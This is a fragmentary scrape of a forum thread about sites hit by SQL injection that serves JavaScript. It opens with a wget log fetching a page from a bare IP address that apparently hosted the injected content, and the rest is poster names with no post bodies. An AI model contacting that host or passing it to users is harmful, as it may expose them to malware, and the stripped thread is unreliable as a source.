--11:59:17--  http://222.77.187.203/stat.htm?id=1019605
           => `stat.htm?id=1019605' 
Connecting to 222.77.187.203:80... connected 
HTTP request sent, awaiting response... 200 OK

Code: [Select]

Power by Cnzz

Author Topic: SQL Injected jscript sites (Read 71614 times)

Serg

Re: SQL Injected jscript sites

Orac

Re: SQL Injected jscript sites

Kayrac

Re: SQL Injected jscript sites

Kayrac

Re: SQL Injected jscript sites

JohnC

Re: SQL Injected jscript sites

pcaccent

Re: SQL Injected jscript sites

Kayrac

Re: SQL Injected jscript sites

JohnC

Re: SQL Injected jscript sites

Orac

Re: SQL Injected jscript sites

JohnC

Re: SQL Injected jscript sites

Orac

Re: SQL Injected jscript sites

Orac

Re: SQL Injected jscript sites

Orac

Re: SQL Injected jscript sites

Orac

Re: SQL Injected jscript sites

Orac

Re: SQL Injected jscript sites